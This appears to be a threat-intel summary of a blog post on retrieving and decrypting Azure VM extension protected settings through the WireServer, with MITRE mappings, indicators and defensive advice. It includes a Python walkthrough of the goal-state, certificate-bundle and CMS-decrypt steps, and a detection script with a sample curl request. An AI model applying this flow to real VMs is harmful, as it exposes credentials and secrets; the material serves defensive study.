Decrypting VM Extension Settings with Azure WireServer

This article describes tools and a process to query the Azure WireServer from a compromised VM to retrieve and decrypt VM extension “Protected Settings” without directly reading local encrypted files. It provides PowerShell and Bash scripts (MicroBurst) that request goal state, fetch extension configs and certificate bundles, decrypt them using generated transport certificates, and extract sensitive settings for assessment and pivoting. #WireServer #Get-AzureVMExtensionSettingsWireServer

Keypoints

  • The Azure WireServer is a cloud-local endpoint accessible only from Azure VMs and can serve VM extension configurations including protected settings.
  • Getting protected settings from the WireServer requires local administrator/root privileges and specific request headers, but can avoid reading local encrypted files directly.
  • The general flow: request the goal state, follow the extension config and certificate URLs it lists, retrieve the encrypted extension settings and the certificate bundle, decrypt the bundle with the private key of a locally generated transport certificate, then decrypt the protected settings with the matching certificate extracted from the bundle.
  • MicroBurst includes PowerShell and Linux scripts that automate the WireServer retrieval and decryption process, demonstrating successful decryption of CustomScriptExtension and OpenSSH extension settings in examples.
  • The tooling writes temporary and certificate files by default but can be adapted to avoid touching disk entirely; extracting private keys from bundles is possible and observed in examples.
  • Detections are limited: notable indicators include execution of the provided scripts, outbound HTTP calls to the WireServer endpoint from processes other than the Azure guest agent (the agent itself polls the endpoint continuously, so the connection alone is not a signal), creation of temporary/certificate files, and the specific request patterns used by the scripts.
  • Defensive recommendations: avoid placing sensitive data in VM extension settings, use references or temporary resources, monitor access to extension files, and consider canary credentials in extensions for early detection.
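
The retrieval flow from the keypoints above, worked as an added example (Python; this is not MicroBurst or NetSPI code). The goal-state and extensions-config XML are constructed samples in the shapes the Azure Linux agent (WALinuxAgent) consumes, with placeholder IDs, a fake certificate and a fake encrypted blob; the request headers are the ones that agent sends when it fetches the certificate bundle. The final decryption step shells out to `openssl cms -decrypt` and only does anything useful on a VM with the real bundle, so it is not exercised offline.

```python
"""Added example, not MicroBurst or NetSPI code: the goal-state -> extensions-config ->
certificate-bundle flow worked offline. The XML/JSON below are constructed samples in the
shapes the Azure Linux agent (WALinuxAgent) consumes; IDs, certificate and encrypted blob
are placeholders. Only decrypt_protected_settings needs a real VM and the openssl CLI."""
import base64
import hashlib
import json
import subprocess
import xml.etree.ElementTree as ET

WIRESERVER = "http://168.63.129.16"  # fixed WireServer address, plain HTTP on port 80
API_VERSION = "2012-11-30"           # x-ms-version header the agent sends on every request

# Constructed goal state shaped like the reply to GET /machine?comp=goalstate.
GOALSTATE_XML = """<?xml version="1.0" encoding="utf-8"?>
<GoalState>
  <Version>2012-11-30</Version>
  <Incarnation>3</Incarnation>
  <Container>
    <ContainerId>00000000-0000-0000-0000-000000000001</ContainerId>
    <RoleInstanceList>
      <RoleInstance>
        <InstanceId>_example-vm</InstanceId>
        <Configuration>
          <ExtensionsConfig>http://168.63.129.16:80/machine/00000000-0000-0000-0000-000000000001/_example-vm?comp=config&amp;type=extensionsConfig&amp;incarnation=3</ExtensionsConfig>
          <Certificates>http://168.63.129.16:80/machine/00000000-0000-0000-0000-000000000001/_example-vm?comp=certificates&amp;incarnation=3</Certificates>
        </Configuration>
      </RoleInstance>
    </RoleInstanceList>
  </Container>
</GoalState>"""

FAKE_CERT_DER = b"constructed stand-in for a DER certificate"      # not a real certificate
FAKE_BLOB_B64 = base64.b64encode(b"constructed stand-in for CMS EnvelopedData").decode()

def thumbprint(cert_der):
    """Azure names bundle certificates by the uppercase hex SHA-1 of their DER bytes."""
    return hashlib.sha1(cert_der).hexdigest().upper()

# Constructed extensions config: RuntimeSettings is JSON carrying the encrypted blob and
# the thumbprint of the bundle certificate that can open it.
EXTCONFIG_XML = """<Extensions version="1.0.0.0" goalStateIncarnation="3">
  <PluginSettings>
    <Plugin name="Microsoft.Azure.Extensions.CustomScript" version="2.1.10">
      <RuntimeSettings seqNo="0">%s</RuntimeSettings>
    </Plugin>
  </PluginSettings>
</Extensions>""" % json.dumps({"runtimeSettings": [{"handlerSettings": {
    "protectedSettingsCertThumbprint": thumbprint(FAKE_CERT_DER),
    "protectedSettings": FAKE_BLOB_B64,
    "publicSettings": {"skipDos2Unix": False}}}]})

def parse_goalstate(xml_text):
    """Step 1: pull the incarnation, container id and the two config URLs to follow."""
    root = ET.fromstring(xml_text)
    cfg = root.find("Container/RoleInstanceList/RoleInstance/Configuration")
    return {"incarnation": root.findtext("Incarnation"),
            "container_id": root.findtext("Container/ContainerId"),
            "extensions_config_url": cfg.findtext("ExtensionsConfig"),
            "certificates_url": cfg.findtext("Certificates")}

def certificate_request_headers(transport_cert_der):
    """Step 2: headers the Linux agent adds on GET <certificates_url>. The WireServer
    returns the bundle as PKCS#7 EnvelopedData (wrapping a PKCS#12) encrypted to this
    transport certificate, so whoever holds its private key can open it."""
    return {"x-ms-version": API_VERSION,
            "x-ms-cipher-name": "DES_EDE3_CBC",
            "x-ms-guest-agent-public-x509-cert": base64.b64encode(transport_cert_der).decode()}

def parse_protected_settings(xml_text):
    """Step 3: list (extension, cert thumbprint, base64 blob) for every plugin whose
    RuntimeSettings JSON carries protectedSettings."""
    found = []
    for plugin in ET.fromstring(xml_text).iterfind("PluginSettings/Plugin"):
        for entry in json.loads(plugin.findtext("RuntimeSettings"))["runtimeSettings"]:
            hs = entry["handlerSettings"]
            if "protectedSettings" in hs:
                found.append({"name": plugin.get("name"),
                              "thumbprint": hs["protectedSettingsCertThumbprint"],
                              "blob": hs["protectedSettings"]})
    return found

def select_decryption_cert(wanted_thumbprint, bundle_certs_der):
    """Step 4: pick the decrypted-bundle certificate the extension config names."""
    for der in bundle_certs_der:
        if thumbprint(der) == wanted_thumbprint.upper():
            return der
    return None

def decrypt_protected_settings(blob_b64, key_pem_path, cert_pem_path):
    """Step 5 (real VM only): the blob is DER CMS EnvelopedData; open it with the matching
    key/cert extracted from the bundle and parse the JSON inside. Requires the openssl CLI."""
    out = subprocess.run(["openssl", "cms", "-decrypt", "-inform", "DER",
                          "-inkey", key_pem_path, "-recip", cert_pem_path],
                         input=base64.b64decode(blob_b64), capture_output=True, check=True)
    return json.loads(out.stdout)

if __name__ == "__main__":
    gs = parse_goalstate(GOALSTATE_XML)
    print("follow:", gs["certificates_url"], "with headers:", certificate_request_headers(FAKE_CERT_DER))
    for item in parse_protected_settings(EXTCONFIG_XML):
        cert = select_decryption_cert(item["thumbprint"], [FAKE_CERT_DER])
        print(item["name"], "-> matching bundle cert found" if cert else "-> no matching cert")
```

On a real VM the bundle comes back encrypted to the freshly generated transport certificate, the PKCS#12 inside it is unpacked, and the certificate whose SHA-1 equals protectedSettingsCertThumbprint is the one that opens that extension's blob; the thumbprints listed under Indicators of Compromise are values of exactly that field.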

MITRE Techniques

  • [T1573] Encrypted Channel – The WireServer itself is reached over plain HTTP, but the certificate bundle comes back encrypted to the transport certificate the script generates and presents in the request, and the protected settings are in turn CMS-encrypted to a certificate from that bundle (“Requesting certificate bond package… Retrieved certificate bond package”).
  • [T1552] Unsecured Credentials – Extraction and decryption of VM extension protected settings to obtain credentials or sensitive configuration (“SUCCESS: Decrypted ProtectedSettings for the Microsoft.Compute.CustomScriptExtension extension” and resulting decrypted command/fileUris shown).
  • [T1105] Ingress Tool Transfer – The process involves downloading resources referenced in extension settings (e.g., fileUris pointing to storage account blobs) which can enable transfer of scripts or payloads (“fileUris”:[“https://notarealstorageaccount.blob.core.windows.net/cse/whoami.ps1?…”]).
  • [T1016] System Network Configuration Discovery – Enumerating and interacting with the WireServer endpoint (a cloud-local service) to discover goalstate and extension configurations (“Retrieving goalstate configuration… Retrieving extension configurations…”).
  • [T1537] Transfer Data to Cloud Account – Use of VM extension settings and storage URIs (SAS tokens) to reference or exfiltrate sensitive data via cloud storage links included in decrypted settings (“fileUris…sp=r&st=2025-09-17…se=2025-12-16…sig=…”).

Indicators of Compromise

  • [Endpoint] WireServer – outbound HTTP requests from the VM to the Azure WireServer at 168.63.129.16 (port 80), a fixed address reachable only from inside Azure (shown in the script logs as “Testing connectivity to WireServer… Connected to WireServer”).
  • [File Names] local temporary and certificate files written by the scripts – examples: certificate_bond.bin, cert_DC=Windows Azure CRP Certificate Generator_B9F1F313.crt, and exported PKCS#12 files saved to certs/ (and other temp files like /tmp/microburst-080D6D).
  • [Extension Names] VM extension identifiers with protected settings – examples: Microsoft.Compute.CustomScriptExtension, Microsoft.Azure.OpenSSH.WindowsOpenSSH, Microsoft.Azure.Extensions.CustomScript (used in the Linux example).
  • [SAS URLs] storage blob URIs referenced in decrypted settings – examples: https://notarealstorageaccount.blob.core.windows.net/cse/whoami.ps1?…sig=idQw8lGU0FnoK4X%2BaaQijzLl9cbbHaKN4RMdd34wrno%3D, https://notarealstorageaccount.blob.core.windows.net/cse/whoami.sh?…sig=TY29jl46inaLN2bb32xf%2B0psaa88MBn852CKapokbwQ%3D (and other SAS URIs).
  • [Certificate Thumbprints] SHA-1 certificate thumbprints included in the goal state and extension configs – examples: B9F1F313496EFF1A8B498C24BBD467E04ADB7131, B8A6C00BA1B792FC0D73DD1AC087468DA34E8E2B.
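
Detection logic for the endpoint indicator above, as an added example (Python; not from the original post). The guest agent talks to 168.63.129.16 all the time, so a bare connection to it is noise; the usable signal is a WireServer request from any other process, stronger when the logged URL asks for the certificate bundle or the extensions config. The agent allowlist, the event shape and the sample events are assumptions and constructed data, to be tuned to your own telemetry.

```python
"""Added example, not from the original post: detection logic for WireServer access by
non-agent processes, run over constructed telemetry. Allowlist and event shape are
assumptions to tune to the images in your environment."""
WIRESERVER_IP = "168.63.129.16"

# Assumed allowlist: Windows guest agent binaries by image name; the Linux agent runs under
# python, so it is recognised by "waagent"/"WALinuxAgent" on its command line instead.
AGENT_IMAGES = {"windowsazureguestagent.exe", "waappagent.exe", "collectguestlogs.exe"}
AGENT_CMDLINE_MARKERS = ("waagent", "walinuxagent")
# URL fragments that mean the caller is after the certificate bundle or extension configs.
BUNDLE_MARKERS = ("comp=certificates", "type=extensionsconfig")

def is_agent(event):
    """True when the connecting process is (plausibly) the Azure guest agent."""
    image = event["image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if image in AGENT_IMAGES:
        return True
    cmdline = event.get("cmdline", "").lower()
    return any(marker in cmdline for marker in AGENT_CMDLINE_MARKERS)

def flag_wireserver_access(events):
    """Return WireServer connections made by non-agent processes: 'high' when the visible
    URL targets the certificate bundle or extensions config, 'medium' otherwise. The URL
    is only present when the request line is logged (proxy, EDR, HTTP capture)."""
    hits = []
    for ev in events:
        if ev.get("dest_ip") != WIRESERVER_IP or is_agent(ev):
            continue
        url = ev.get("url", "")
        severity = "high" if any(m in url.lower() for m in BUNDLE_MARKERS) else "medium"
        hits.append({"image": ev["image"], "url": url, "severity": severity})
    return hits

# Constructed sample events (Sysmon network-connect / Linux EDR style); paths, versions and
# IDs are illustrative, not captured from a real host.
SAMPLE_EVENTS = [
    {"image": r"C:\WindowsAzure\GuestAgent_2.7.41491.1\WindowsAzureGuestAgent.exe",
     "dest_ip": WIRESERVER_IP, "url": "http://168.63.129.16/machine?comp=goalstate"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_ip": WIRESERVER_IP,
     "url": "http://168.63.129.16/machine/00000000-0000-0000-0000-000000000001/_vm?comp=certificates&incarnation=3"},
    {"image": "/usr/bin/python3", "dest_ip": WIRESERVER_IP,
     "cmdline": "python3 -u bin/WALinuxAgent-2.9.1.1-py3.8.egg -run-exthandlers",
     "url": "http://168.63.129.16/machine?comp=goalstate"},
    {"image": "/usr/bin/curl", "dest_ip": WIRESERVER_IP,
     "cmdline": "curl -s -H x-ms-version:2012-11-30 http://168.63.129.16/machine?comp=goalstate",
     "url": "http://168.63.129.16/machine?comp=goalstate"},
    # Different cloud-local endpoint (instance metadata), so not a WireServer hit.
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_ip": "169.254.169.254", "url": "http://169.254.169.254/metadata/instance"},
]

if __name__ == "__main__":
    for hit in flag_wireserver_access(SAMPLE_EVENTS):
        print(hit["severity"].upper(), hit["image"], hit["url"])
```

Pair this with the file indicators: a non-agent process that both reaches the WireServer and then writes PKCS#12 or .crt files is a far stronger match for the scripts than either observation alone.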


Read more: https://www.netspi.com/blog/technical-blog/cloud-pentesting/decrypting-vm-extension-settings-with-azure-wireserver/